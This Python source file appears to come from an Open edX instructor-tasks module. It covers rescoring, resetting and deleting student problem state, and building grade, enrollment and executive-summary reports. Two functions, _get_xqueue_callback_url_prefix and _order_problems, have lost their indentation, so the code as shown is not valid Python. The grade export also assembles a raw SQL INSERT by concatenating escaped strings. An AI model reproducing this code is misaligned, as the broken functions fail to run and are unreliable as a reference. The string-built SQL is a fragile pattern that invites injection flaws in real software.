    If `student_identifier` is not None, it is used as an additional filter to limit the modules to those belonging
    to that student. If `student_identifier` is None, performs update on modules for all students on the specified problem.

    If a `filter_fcn` is not None, it is applied to the query that has been constructed.  It takes one
    argument, which is the query being filtered, and returns the filtered version of the query.

    The `update_fcn` is called on each StudentModule that passes the resulting filtering.
    It is passed three arguments:  the module_descriptor for the module pointed to by the
    module_state_key, the particular StudentModule to update, and the xmodule_instance_args being
    passed through.  If the value returned by the update function evaluates to a boolean True,
    the update is successful; False indicates the update on the particular student module failed.
    A raised exception indicates a fatal condition -- that no other student modules should be considered.

    The return value is a dict containing the task's results, with the following keys:

          'attempted': number of attempts made
          'succeeded': number of attempts that "succeeded"
          'skipped': number of attempts that "skipped"
          'failed': number of attempts that "failed"
          'total': number of possible updates to attempt
          'action_name': user-visible verb to use in status messages.  Should be past-tense.
              Pass-through of input `action_name`.
          'duration_ms': how long the task has (or had) been running.

    Because this is run internal to a task, it does not catch exceptions.  These are allowed to pass up to the
    next level, so that it can set the failure modes and capture the error trace in the InstructorTask and the
    result object.
    """
    start_time = time()
    usage_keys = []
    problem_url = task_input.get('problem_url')
    entrance_exam_url = task_input.get('entrance_exam_url')
    student_identifier = task_input.get('student')
    problems = {}

    # if problem_url is present make a usage key from it
    if problem_url:
        usage_key = course_id.make_usage_key_from_deprecated_string(problem_url)
        usage_keys.append(usage_key)

        # find the problem descriptor:
        problem_descriptor = modulestore().get_item(usage_key)
        problems[unicode(usage_key)] = problem_descriptor

    # if entrance_exam is present grab all problems in it
    # (note: this replaces, not extends, any problem_url-derived entries)
    if entrance_exam_url:
        problems = get_problems_in_section(entrance_exam_url)
        usage_keys = [UsageKey.from_string(location) for location in problems.keys()]

    # find the modules in question
    modules_to_update = StudentModule.objects.filter(course_id=course_id, module_state_key__in=usage_keys)

    # give the option of updating an individual student. If not specified,
    # then updates all students who have responded to a problem so far
    student = None
    if student_identifier is not None:
        # if an identifier is supplied, then look for the student,
        # and let it throw an exception if none is found.
        if "@" in student_identifier:
            student = User.objects.get(email=student_identifier)
        # NOTE(review): the "is not None" re-check below is redundant -- the
        # enclosing "if" already guarantees it.  Kept as-is.
        elif student_identifier is not None:
            student = User.objects.get(username=student_identifier)

    if student is not None:
        modules_to_update = modules_to_update.filter(student_id=student.id)

    if filter_fcn is not None:
        modules_to_update = filter_fcn(modules_to_update)

    task_progress = TaskProgress(action_name, modules_to_update.count(), start_time)
    task_progress.update_task_state()

    for module_to_update in modules_to_update:
        task_progress.attempted += 1
        module_descriptor = problems[unicode(module_to_update.module_state_key)]
        # There is no try here:  if there's an error, we let it throw, and the task will
        # be marked as FAILED, with a stack trace.
        with dog_stats_api.timer('instructor_tasks.module.time.step', tags=[u'action:{name}'.format(name=action_name)]):
            update_status = update_fcn(module_descriptor, module_to_update)
            if update_status == UPDATE_STATUS_SUCCEEDED:
                # If the update_fcn returns true, then it performed some kind of work.
                # Logging of failures is left to the update_fcn itself.
                task_progress.succeeded += 1
            elif update_status == UPDATE_STATUS_FAILED:
                task_progress.failed += 1
            elif update_status == UPDATE_STATUS_SKIPPED:
                task_progress.skipped += 1
            else:
                raise UpdateProblemModuleStateError("Unexpected update_status returned: {}".format(update_status))

    return task_progress.update_task_state()
def _get_task_id_from_xmodule_args(xmodule_instance_args):
    """Return the 'task_id' entry of `xmodule_instance_args`, or the
    UNKNOWN_TASK_ID default when the dict is missing or lacks the key."""
    if xmodule_instance_args is None:
        return UNKNOWN_TASK_ID
    return xmodule_instance_args.get('task_id', UNKNOWN_TASK_ID)
def _get_xqueue_callback_url_prefix(xmodule_instance_args):
"""Gets prefix to use when constructing xqueue_callback_url."""
return xmodule_instance_args.get('xqueue_callback_url_prefix', '') if xmodule_instance_args is not None else ''
def _get_track_function_for_task(student, xmodule_instance_args=None, source_page='x_module_task'):
    """
    Build a tracking callable for use inside a task.

    The returned function accepts an event_type (string) and an event (dict),
    as supplied by CapaModule via ModuleSystem, and forwards them to
    task_track together with the request info, task info, and page name
    captured here.
    """
    # Request-related tracking information comes from the args passthrough;
    # the task-specific information is assembled locally.
    if xmodule_instance_args is not None:
        request_info = xmodule_instance_args.get('request_info', {})
    else:
        request_info = {}
    task_info = {
        'student': student.username,
        'task_id': _get_task_id_from_xmodule_args(xmodule_instance_args),
    }

    def track_function(event_type, event):
        return task_track(request_info, task_info, event_type, event, page=source_page)

    return track_function
def _get_module_instance_for_task(course_id, student, module_descriptor, xmodule_instance_args=None,
                                  grade_bucket_type=None, course=None):
    """
    Fetches a StudentModule instance for a given `course_id`, `student` object, and `module_descriptor`.
    `xmodule_instance_args` is used to provide information for creating a track function and an XQueue callback.
    These are passed, along with `grade_bucket_type`, to get_module_for_descriptor_internal, which sidesteps
    the need for a Request object when instantiating an xmodule instance.
    """
    # Reconstitute the problem's corresponding XModule:
    field_data_cache = FieldDataCache.cache_for_descriptor_descendents(course_id, student, module_descriptor)

    # Request-level context comes from the args pass-through (may be absent);
    # supplement it with task-specific identifiers.
    if xmodule_instance_args is not None:
        request_info = xmodule_instance_args.get('request_info', {})
        callback_url_prefix = xmodule_instance_args.get('xqueue_callback_url_prefix', '')
    else:
        request_info = {}
        callback_url_prefix = ''
    task_info = {
        "student": student.username,
        "task_id": _get_task_id_from_xmodule_args(xmodule_instance_args),
    }

    def track_function(event_type, event):
        """Log `event` (dict) of `event_type` (string) against the request/task context."""
        return task_track(request_info, task_info, event_type, event, page='x_module_task')

    return get_module_for_descriptor_internal(
        user=student,
        descriptor=module_descriptor,
        field_data_cache=field_data_cache,
        course_id=course_id,
        track_function=track_function,
        xqueue_callback_url_prefix=callback_url_prefix,
        grade_bucket_type=grade_bucket_type,
        # This module isn't being used for front-end rendering
        request_token=None,
        # pass in a loaded course for override enabling
        course=course
    )
@transaction.autocommit
def rescore_problem_module_state(xmodule_instance_args, module_descriptor, student_module):
    '''
    Takes an XModule descriptor and a corresponding StudentModule object, and
    performs rescoring on the student's problem submission.

    Throws exceptions if the rescoring is fatal and should be aborted if in a loop.
    In particular, raises UpdateProblemModuleStateError if module fails to instantiate,
    or if the module doesn't support rescoring.

    Returns UPDATE_STATUS_SUCCEEDED if the problem was successfully rescored
    for the given student, and UPDATE_STATUS_FAILED if the rescore call came
    back with an unexpected (non-fatal) response.
    '''
    # unpack the StudentModule:
    course_id = student_module.course_id
    student = student_module.student
    usage_key = student_module.module_state_key
    # Batch modulestore reads within a single bulk operation for efficiency.
    with modulestore().bulk_operations(course_id):
        course = get_course_by_id(course_id)
        # TODO: Here is a call site where we could pass in a loaded course. I
        # think we certainly need it since grading is happening here, and field
        # overrides would be important in handling that correctly
        instance = _get_module_instance_for_task(
            course_id,
            student,
            module_descriptor,
            xmodule_instance_args,
            grade_bucket_type='rescore',
            course=course
        )
        if instance is None:
            # Either permissions just changed, or someone is trying to be clever
            # and load something they shouldn't have access to.
            msg = "No module {loc} for student {student}--access denied?".format(
                loc=usage_key,
                student=student
            )
            TASK_LOG.debug(msg)
            raise UpdateProblemModuleStateError(msg)
        if not hasattr(instance, 'rescore_problem'):
            # This should also not happen, since it should be already checked in the caller,
            # but check here to be sure.
            msg = "Specified problem does not support rescoring."
            raise UpdateProblemModuleStateError(msg)
        result = instance.rescore_problem()
        # Persist any state the module changed while rescoring.
        instance.save()
        if 'success' not in result:
            # don't consider these fatal, but false means that the individual call didn't complete:
            TASK_LOG.warning(
                u"error processing rescore call for course %(course)s, problem %(loc)s "
                u"and student %(student)s: unexpected response %(msg)s",
                dict(
                    msg=result,
                    course=course_id,
                    loc=usage_key,
                    student=student
                )
            )
            return UPDATE_STATUS_FAILED
        elif result['success'] not in ['correct', 'incorrect']:
            # A 'success' value other than correct/incorrect indicates the
            # rescore ran but reported a problem-level error message.
            TASK_LOG.warning(
                u"error processing rescore call for course %(course)s, problem %(loc)s "
                u"and student %(student)s: %(msg)s",
                dict(
                    msg=result['success'],
                    course=course_id,
                    loc=usage_key,
                    student=student
                )
            )
            return UPDATE_STATUS_FAILED
        else:
            TASK_LOG.debug(
                u"successfully processed rescore call for course %(course)s, problem %(loc)s "
                u"and student %(student)s: %(msg)s",
                dict(
                    msg=result['success'],
                    course=course_id,
                    loc=usage_key,
                    student=student
                )
            )
            return UPDATE_STATUS_SUCCEEDED
@transaction.autocommit
def reset_attempts_module_state(xmodule_instance_args, _module_descriptor, student_module):
    """
    Resets problem attempts to zero for specified `student_module`.
    Returns a status of UPDATE_STATUS_SUCCEEDED if a problem has non-zero attempts
    that are being reset, and UPDATE_STATUS_SKIPPED otherwise.
    """
    problem_state = json.loads(student_module.state) if student_module.state else {}
    previous_attempts = problem_state.get('attempts', 0)
    if not previous_attempts > 0:
        # Nothing to reset: no attempts recorded, or already zero.
        return UPDATE_STATUS_SKIPPED

    problem_state['attempts'] = 0
    # Serialize the modified state back onto the StudentModule row.
    student_module.state = json.dumps(problem_state)
    student_module.save()

    # Emit a tracking event recording the reset, carrying over request
    # context passed through from the originating task.
    track_function = _get_track_function_for_task(student_module.student, xmodule_instance_args)
    track_function('problem_reset_attempts', {"old_attempts": previous_attempts, "new_attempts": 0})
    return UPDATE_STATUS_SUCCEEDED
@transaction.autocommit
def delete_problem_module_state(xmodule_instance_args, _module_descriptor, student_module):
    """
    Delete the StudentModule entry.
    Always returns UPDATE_STATUS_SUCCEEDED, indicating success, if it doesn't raise an exception due to database error.
    """
    student_module.delete()
    # Record the deletion in the tracking log, using request context
    # supplied via the task's pass-through args.
    track = _get_track_function_for_task(student_module.student, xmodule_instance_args)
    track('problem_delete_state', {})
    return UPDATE_STATUS_SUCCEEDED
def upload_csv_to_report_store(rows, csv_name, course_id, timestamp, config_name='GRADES_DOWNLOAD'):
    """
    Upload data as a CSV using ReportStore.

    Arguments:
        rows: CSV data in the following format (first column may be a
            header):
            [
                [row1_colum1, row1_colum2, ...],
                ...
            ]
        csv_name: Name of the resulting CSV
        course_id: ID of the course
    """
    # Build the destination filename: <course-prefix>_<name>_<YYYY-mm-dd-HHMM>.csv
    filename = u"{course_prefix}_{csv_name}_{timestamp_str}.csv".format(
        course_prefix=course_filename_prefix_generator(course_id),
        csv_name=csv_name,
        timestamp_str=timestamp.strftime("%Y-%m-%d-%H%M")
    )
    ReportStore.from_config(config_name).store_rows(course_id, filename, rows)
    # Emit an analytics event noting that the report was produced.
    tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": csv_name, })
def upload_exec_summary_to_store(data_dict, report_name, course_id, generated_at, config_name='FINANCIAL_REPORTS'):
    """
    Upload Executive Summary Html file using ReportStore.

    Arguments:
        data_dict: containing executive report data.
        report_name: Name of the resulting Html File.
        course_id: ID of the course
    """
    # Render the report template into an in-memory buffer.
    rendered_html = render_to_string("instructor/instructor_dashboard_2/executive_summary.html", data_dict)
    filename = u"{course_prefix}_{report_name}_{timestamp_str}.html".format(
        course_prefix=course_filename_prefix_generator(course_id),
        report_name=report_name,
        timestamp_str=generated_at.strftime("%Y-%m-%d-%H%M")
    )
    ReportStore.from_config(config_name).store(
        course_id,
        filename,
        StringIO(rendered_html),
        config={
            'content_type': 'text/html',
            'content_encoding': None,
        }
    )
    # Emit an analytics event noting that the report was produced.
    tracker.emit(REPORT_REQUESTED_EVENT_NAME, {"report_type": report_name})
def upload_grades_csv(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):  # pylint: disable=too-many-statements
    """
    For a given `course_id`, generate a grades CSV file for all students that
    are enrolled, and store using a `ReportStore`. Once created, the files can
    be accessed by instantiating another `ReportStore` (via
    `ReportStore.from_config()`) and calling `link_for()` on it. Writes are
    buffered, so we'll never write part of a CSV file to S3 -- i.e. any files
    that are visible in ReportStore will be complete ones.

    As we start to add more CSV downloads, it will probably be worthwhile to
    make a more general CSVDoc class instead of building out the rows like we
    do here.

    In addition to the CSV upload, per-student scores are mirrored into the
    cm_plugin_cmgradebookrecords table via a bulk raw-SQL upsert.
    """
    start_time = time()
    start_date = datetime.now(UTC)
    status_interval = 100
    enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
    task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
    fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
    task_info_string = fmt.format(
        task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
        entry_id=_entry_id,
        course_id=course_id,
        task_input=_task_input
    )
    TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
    course = get_course_by_id(course_id)
    course_is_cohorted = is_course_cohorted(course.id)
    cohorts_header = ['Cohort Name'] if course_is_cohorted else []
    experiment_partitions = get_split_user_partitions(course.user_partitions)
    group_configs_header = [u'Experiment Group ({})'.format(partition.name) for partition in experiment_partitions]
    certificate_info_header = ['Certificate Eligible', 'Certificate Delivered', 'Certificate Type']
    certificate_whitelist = CertificateWhitelist.objects.filter(course_id=course_id, whitelist=True)
    whitelisted_user_ids = [entry.user_id for entry in certificate_whitelist]
    # Mark the mirrored gradebook row as pending while we regenerate it.
    cm_gradebook, gb_created = CmGradebook.objects.get_or_create(course_id=str(course_id))
    cm_gradebook.state = 'pending'
    cm_gradebook.save()
    cursor = connection.cursor()
    insert_records = ""
    # Loop over all our students and build our CSV lists in memory
    header = None
    rows = []
    gradebook_header = None
    err_rows = [["id", "username", "error_msg"]]
    current_step = {'step': 'Calculating Grades'}
    total_enrolled_students = enrolled_students.count()
    student_counter = 0
    TASK_LOG.info(
        u'%s, Task type: %s, Current step: %s, Starting grade calculation for total students: %s',
        task_info_string,
        action_name,
        current_step,
        total_enrolled_students
    )
    for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students):
        # Periodically update task status (this is a cache write)
        if task_progress.attempted % status_interval == 0:
            task_progress.update_task_state(extra_meta=current_step)
        task_progress.attempted += 1
        # Now add a log entry after each student is graded to get a sense
        # of the task's progress
        student_counter += 1
        TASK_LOG.info(
            u'%s, Task type: %s, Current step: %s, Grade calculation in-progress for students: %s/%s',
            task_info_string,
            action_name,
            current_step,
            student_counter,
            total_enrolled_students
        )
        if gradeset:
            # We were able to successfully grade this student for this course.
            task_progress.succeeded += 1
            if not header:
                # The first graded student determines the column layout.
                header = [section['label'] for section in gradeset[u'section_breakdown']]
                rows.append(
                    ["id", "email", "username", "grade"] + header + cohorts_header +
                    group_configs_header + ['Enrollment Track', 'Verification Status'] + certificate_info_header
                )
                gradebook_header = ["id", "email", "username", "grade"] + header + ["Certificate Eligible"]
            percents = {
                section['label']: section.get('percent', 0.0)
                for section in gradeset[u'section_breakdown']
                if 'label' in section
            }
            cohorts_group_name = []
            if course_is_cohorted:
                group = get_cohort(student, course_id, assign=False)
                cohorts_group_name.append(group.name if group else '')
            group_configs_group_names = []
            for partition in experiment_partitions:
                group = LmsPartitionService(student, course_id).get_group(partition, assign=False)
                group_configs_group_names.append(group.name if group else '')
            enrollment_mode = CourseEnrollment.enrollment_mode_for_user(student, course_id)[0]
            verification_status = SoftwareSecurePhotoVerification.verification_status_for_user(
                student,
                course_id,
                enrollment_mode
            )
            certificate_info = certificate_info_for_user(
                student,
                course_id,
                gradeset['grade'],
                student.id in whitelisted_user_ids
            )
            # Not everybody has the same gradable items. If the item is not
            # found in the user's gradeset, just assume it's a 0. The aggregated
            # grades for their sections and overall course will be calculated
            # without regard for the item they didn't have access to, so it's
            # possible for a student to have a 0.0 show up in their row but
            # still have 100% for the course.
            row_percents = [percents.get(label, 0.0) for label in header]
            rows.append(
                [student.id, student.email, student.username, gradeset['percent']] +
                row_percents + cohorts_group_name + group_configs_group_names +
                [enrollment_mode] + [verification_status] + certificate_info
            )
            # FIX: compare string content with ==, not identity with `is`;
            # identity comparison of strings is implementation-dependent.
            certificate_eligible = 0.0 if certificate_info[0] == 'N' else 1.0
            insert_records += "('%s', '%s', %f, %d, now(), now()), " % (
                MySQLdb.escape_string(student.email), certificate_info_header[0], certificate_eligible, cm_gradebook.id
            )
            for label in header:
                score = percents.get(label, 0.0)
                if score != 0.0:
                    # FIX: escape the label too -- section labels come from
                    # course content and may contain quote characters.
                    insert_records += "('%s', '%s', %f, %d, now(), now()), " % (
                        MySQLdb.escape_string(student.email), MySQLdb.escape_string(label), score, cm_gradebook.id
                    )
            insert_records += "('%s', 'grade', %f, %d, now(), now()), " % (
                MySQLdb.escape_string(student.email),
                gradeset['percent'] if gradeset['percent'] is not None else 0.0,
                cm_gradebook.id
            )
        else:
            # An empty gradeset means we failed to grade a student.
            task_progress.failed += 1
            err_rows.append([student.id, student.username, err_msg])
    TASK_LOG.info(
        u'%s, Task type: %s, Current step: %s, Grade calculation completed for students: %s/%s',
        task_info_string,
        action_name,
        current_step,
        student_counter,
        total_enrolled_students
    )
    try:
        # FIX: only run the bulk insert when there is at least one record;
        # with zero graded students the previous code issued a malformed
        # "... VALUES " statement (empty insert_records[:-2]).
        if insert_records:
            query = "INSERT INTO cm_plugin_cmgradebookrecords (user_email,unit_name, score, cm_gradebook_id, created_at, updated_at) VALUES %s ON DUPLICATE KEY UPDATE score = VALUES(cm_plugin_cmgradebookrecords.score), updated_at = VALUES(cm_plugin_cmgradebookrecords.updated_at)" % insert_records[:-2]
            cursor.execute(query)
    except DatabaseError as fail:
        # Non-fatal: the CSV upload below should still proceed.
        TASK_LOG.error("Insert command failed for gradebook id => %d . Error: %s" % (cm_gradebook.id, str(fail)))
    finally:
        cursor.close()
    cm_gradebook.state = 'completed'
    cm_gradebook.headers = ",".join(gradebook_header) if gradebook_header is not None else ''
    cm_gradebook.save()
    # By this point, we've got the rows we're going to stuff into our CSV files.
    current_step = {'step': 'Uploading CSVs'}
    task_progress.update_task_state(extra_meta=current_step)
    TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
    # Perform the actual upload
    upload_csv_to_report_store(rows, 'grade_report', course_id, start_date)
    # If there are any error rows (don't count the header), write them out as well
    if len(err_rows) > 1:
        upload_csv_to_report_store(err_rows, 'grade_report_err', course_id, start_date)
    # One last update before we close out...
    TASK_LOG.info(u'%s, Task type: %s, Finalizing grade task', task_info_string, action_name)
    return task_progress.update_task_state(extra_meta=current_step)
def _order_problems(blocks):
"""
Sort the problems by the assignment type and assignment that it belongs to.
Args:
blocks (OrderedDict) - A course structure containing blocks that have been ordered
(i.e. when we iterate over them, we will see them in the order
that they appear in the course).
Returns:
an OrderedDict that maps a problem id to its headers in the final report.
"""
problems = OrderedDict()
assignments = dict()
# First, sort out all the blocks into their correct assignments and all the
# assignments into their correct types.
for block in blocks:
# Put the assignments in order into the assignments list.
if blocks[block]['block_type'] == 'sequential':
block_format = blocks[block]['format']
if block_format not in assignments:
assignments[block_format] = OrderedDict()
assignments[block_format][block] = list()
# Put the problems into the correct order within their assignment.
if blocks[block]['block_type'] == 'problem' and blocks[block]['graded'] is True:
current = blocks[block]['parent']
# crawl up the tree for the sequential block
while blocks[current]['block_type'] != 'sequential':
current = blocks[current]['parent']
current_format = blocks[current]['format']
assignments[current_format][current].append(block)
# Now that we have a sorting and an order for the assignments and problems,
# iterate through them in order to generate the header row.
for assignment_type in assignments:
for assignment_index, assignment in enumerate(assignments[assignment_type].keys(), start=1):
for problem in assignments[assignment_type][assignment]:
header_name = u"{assignment_type} {assignment_index}: {assignment_name} - {block}".format(
block=blocks[problem]['display_name'],
assignment_type=assignment_type,
assignment_index=assignment_index,
assignment_name=blocks[assignment]['display_name']
)
problems[problem] = [header_name + " (Earned)", header_name + " (Possible)"]
return problems
def upload_problem_grade_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
    """
    Generate a CSV containing all students' problem grades within a given
    `course_id`.

    The report has one (Earned, Possible) column pair per graded problem,
    ordered by assignment type and assignment, plus the final grade.
    Requires a cached CourseStructure for the course; when none exists yet
    the task exits early with an explanatory status message.
    """
    start_time = time()
    start_date = datetime.now(UTC)
    status_interval = 100
    enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
    task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
    # This struct encapsulates both the display names of each static item in the
    # header row as values as well as the django User field names of those items
    # as the keys. It is structured in this way to keep the values related.
    header_row = OrderedDict([('id', 'Student ID'), ('email', 'Email'), ('username', 'Username')])
    try:
        course_structure = CourseStructure.objects.get(course_id=course_id)
        blocks = course_structure.ordered_blocks
        problems = _order_problems(blocks)
    except CourseStructure.DoesNotExist:
        # No cached structure yet -- report the condition in the task status
        # rather than failing outright.
        return task_progress.update_task_state(
            extra_meta={'step': 'Generating course structure. Please refresh and try again.'}
        )
    # Just generate the static fields for now.
    rows = [list(header_row.values()) + ['Final Grade'] + list(chain.from_iterable(problems.values()))]
    error_rows = [list(header_row.values()) + ['error_msg']]
    current_step = {'step': 'Calculating Grades'}
    for student, gradeset, err_msg in iterate_grades_for(course_id, enrolled_students, keep_raw_scores=True):
        student_fields = [getattr(student, field_name) for field_name in header_row]
        task_progress.attempted += 1
        if 'percent' not in gradeset or 'raw_scores' not in gradeset:
            # There was an error grading this student.
            # Generally there will be a non-empty err_msg, but that is not always the case.
            if not err_msg:
                err_msg = u"Unknown error"
            error_rows.append(student_fields + [err_msg])
            task_progress.failed += 1
            continue
        final_grade = gradeset['percent']
        # Only consider graded problems
        problem_scores = {unicode(score.module_id): score for score in gradeset['raw_scores'] if score.graded}
        earned_possible_values = list()
        for problem_id in problems:
            try:
                problem_score = problem_scores[problem_id]
                earned_possible_values.append([problem_score.earned, problem_score.possible])
            except KeyError:
                # The student has not been graded on this problem. For example,
                # iterate_grades_for skips problems that students have never
                # seen in order to speed up report generation. It could also be
                # the case that the student does not have access to it (e.g. A/B
                # test or cohorted courseware).
                earned_possible_values.append(['N/A', 'N/A'])
        rows.append(student_fields + [final_grade] + list(chain.from_iterable(earned_possible_values)))
        task_progress.succeeded += 1
        # Periodically checkpoint progress (this is a cache write).
        if task_progress.attempted % status_interval == 0:
            task_progress.update_task_state(extra_meta=current_step)
    # Perform the upload if any students have been successfully graded
    if len(rows) > 1:
        upload_csv_to_report_store(rows, 'problem_grade_report', course_id, start_date)
    # If there are any error rows, write them out as well
    if len(error_rows) > 1:
        upload_csv_to_report_store(error_rows, 'problem_grade_report_err', course_id, start_date)
    return task_progress.update_task_state(extra_meta={'step': 'Uploading CSV'})
def upload_students_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
    """
    For a given `course_id`, generate a CSV file containing profile
    information for all students that are enrolled, and store using a
    `ReportStore`.
    """
    start_time = time()
    start_date = datetime.now(UTC)
    enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id)
    task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
    task_progress.update_task_state(extra_meta={'step': 'Calculating Profile Info'})

    # Compute the requested student-feature table and prepend its header row.
    query_features = task_input.get('features')
    student_data = enrolled_students_features(course_id, query_features)
    header, rows = format_dictlist(student_data, query_features)
    task_progress.attempted = task_progress.succeeded = len(rows)
    task_progress.skipped = task_progress.total - task_progress.attempted
    rows.insert(0, header)

    upload_step = {'step': 'Uploading CSV'}
    task_progress.update_task_state(extra_meta=upload_step)
    # Perform the upload
    upload_csv_to_report_store(rows, 'student_profile_info', course_id, start_date)
    return task_progress.update_task_state(extra_meta=upload_step)
def upload_enrollment_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
    """
    For a given `course_id`, generate a CSV file containing profile
    information for all students that are enrolled, and store using a
    `ReportStore`.

    Covers both currently-enrolled and dropped-out users, and includes
    payment/enrollment details from PaidCourseEnrollmentReportProvider.
    """
    start_time = time()
    start_date = datetime.now(UTC)
    status_interval = 100
    students_in_course = CourseEnrollment.objects.enrolled_and_dropped_out_users(course_id)
    task_progress = TaskProgress(action_name, students_in_course.count(), start_time)
    fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
    task_info_string = fmt.format(
        task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
        entry_id=_entry_id,
        course_id=course_id,
        task_input=_task_input
    )
    TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
    # display name map for the column headers.
    # NOTE: hoisted out of the per-student loop -- it is loop-invariant and
    # was previously rebuilt (with _() translation calls) once per student.
    enrollment_report_headers = {
        'User ID': _('User ID'),
        'Username': _('Username'),
        'Full Name': _('Full Name'),
        'First Name': _('First Name'),
        'Last Name': _('Last Name'),
        'Company Name': _('Company Name'),
        'Title': _('Title'),
        'Language': _('Language'),
        'Year of Birth': _('Year of Birth'),
        'Gender': _('Gender'),
        'Level of Education': _('Level of Education'),
        'Mailing Address': _('Mailing Address'),
        'Goals': _('Goals'),
        'City': _('City'),
        'Country': _('Country'),
        'Enrollment Date': _('Enrollment Date'),
        'Currently Enrolled': _('Currently Enrolled'),
        'Enrollment Source': _('Enrollment Source'),
        'Enrollment Role': _('Enrollment Role'),
        'List Price': _('List Price'),
        'Payment Amount': _('Payment Amount'),
        'Coupon Codes Used': _('Coupon Codes Used'),
        'Registration Code Used': _('Registration Code Used'),
        'Payment Status': _('Payment Status'),
        'Transaction Reference Number': _('Transaction Reference Number')
    }
    # Loop over all our students and build our CSV lists in memory
    rows = []
    header = None
    current_step = {'step': 'Gathering Profile Information'}
    enrollment_report_provider = PaidCourseEnrollmentReportProvider()
    total_students = students_in_course.count()
    student_counter = 0
    TASK_LOG.info(
        u'%s, Task type: %s, Current step: %s, generating detailed enrollment report for total students: %s',
        task_info_string,
        action_name,
        current_step,
        total_students
    )
    for student in students_in_course:
        # Periodically update task status (this is a cache write)
        if task_progress.attempted % status_interval == 0:
            task_progress.update_task_state(extra_meta=current_step)
        task_progress.attempted += 1
        # Now add a log entry after certain intervals to get a hint that task is in progress
        student_counter += 1
        if student_counter % 100 == 0:
            TASK_LOG.info(
                u'%s, Task type: %s, Current step: %s, gathering enrollment profile for students in progress: %s/%s',
                task_info_string,
                action_name,
                current_step,
                student_counter,
                total_students
            )
        user_data = enrollment_report_provider.get_user_profile(student.id)
        course_enrollment_data = enrollment_report_provider.get_enrollment_info(student, course_id)
        payment_data = enrollment_report_provider.get_payment_info(student, course_id)
        if not header:
            # First student: derive the column order from the data dicts and
            # translate each column name where a localized label exists.
            header = user_data.keys() + course_enrollment_data.keys() + payment_data.keys()
            display_headers = [
                enrollment_report_headers.get(header_element, header_element)
                for header_element in header
            ]
            rows.append(display_headers)
        rows.append(user_data.values() + course_enrollment_data.values() + payment_data.values())
        task_progress.succeeded += 1
    TASK_LOG.info(
        u'%s, Task type: %s, Current step: %s, Detailed enrollment report generated for students: %s/%s',
        task_info_string,
        action_name,
        current_step,
        student_counter,
        total_students
    )
    # By this point, we've got the rows we're going to stuff into our CSV files.
    current_step = {'step': 'Uploading CSVs'}
    task_progress.update_task_state(extra_meta=current_step)
    TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
    # Perform the actual upload
    upload_csv_to_report_store(rows, 'enrollment_report', course_id, start_date, config_name='FINANCIAL_REPORTS')
    # One last update before we close out...
    TASK_LOG.info(u'%s, Task type: %s, Finalizing detailed enrollment task', task_info_string, action_name)
    return task_progress.update_task_state(extra_meta=current_step)
def upload_may_enroll_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
    """
    For a given `course_id`, generate a CSV file containing
    information about students who may enroll but have not done so
    yet, and store using a `ReportStore`.
    """
    start_time = time()
    start_date = datetime.now(UTC)
    # This task produces a single report.
    task_progress = TaskProgress(action_name, 1, start_time)
    task_progress.update_task_state(extra_meta={'step': 'Calculating info about students who may enroll'})

    # Compute result table and format it
    query_features = task_input.get('features')
    student_data = list_may_enroll(course_id, query_features)
    header, rows = format_dictlist(student_data, query_features)
    task_progress.attempted = task_progress.succeeded = len(rows)
    task_progress.skipped = task_progress.total - task_progress.attempted
    rows.insert(0, header)

    upload_step = {'step': 'Uploading CSV'}
    task_progress.update_task_state(extra_meta=upload_step)
    # Perform the upload
    upload_csv_to_report_store(rows, 'may_enroll_info', course_id, start_date)
    return task_progress.update_task_state(extra_meta=upload_step)
def get_executive_report(course_id):
    """
    Returns dict containing information about the course executive summary.
    """
    # -- Revenue -----------------------------------------------------------
    single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_id)
    bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_id)
    paid_invoices_total = InvoiceTransaction.get_total_amount_of_paid_course_invoices(course_id)
    gross_paid_revenue = single_purchase_total + bulk_purchase_total + paid_invoices_total
    all_invoices_total = Invoice.get_invoice_total_amount_for_course(course_id)
    gross_pending_revenue = all_invoices_total - float(paid_invoices_total)
    gross_revenue = float(gross_paid_revenue) + float(gross_pending_revenue)

    # -- Refunds -----------------------------------------------------------
    total_seats_refunded = (
        PaidCourseRegistration.get_self_purchased_seat_count(course_id, status='refunded') +
        CourseRegCodeItem.get_bulk_purchased_seat_count(course_id, status='refunded')
    )
    total_amount_refunded = (
        PaidCourseRegistration.get_total_amount_of_purchased_item(course_id, status='refunded') +
        CourseRegCodeItem.get_total_amount_of_purchased_item(course_id, status='refunded')
    )

    # -- Discounts / registration codes ------------------------------------
    top_discounted_codes = CouponRedemption.get_top_discount_codes_used(course_id)
    total_coupon_codes_purchases = CouponRedemption.get_total_coupon_code_purchases(course_id)
    unused_registration_codes = sum(
        1 for registration_code in CourseRegistrationCode.order_generated_registration_codes(course_id)
        if not RegistrationCodeRedemption.is_registration_code_redeemed(registration_code.code)
    )

    # -- Seats -------------------------------------------------------------
    self_purchased_seat_count = PaidCourseRegistration.get_self_purchased_seat_count(course_id)
    bulk_purchased_seat_count = CourseRegCodeItem.get_bulk_purchased_seat_count(course_id)
    total_invoiced_seats = CourseRegistrationCode.invoice_generated_registration_codes(course_id).count()
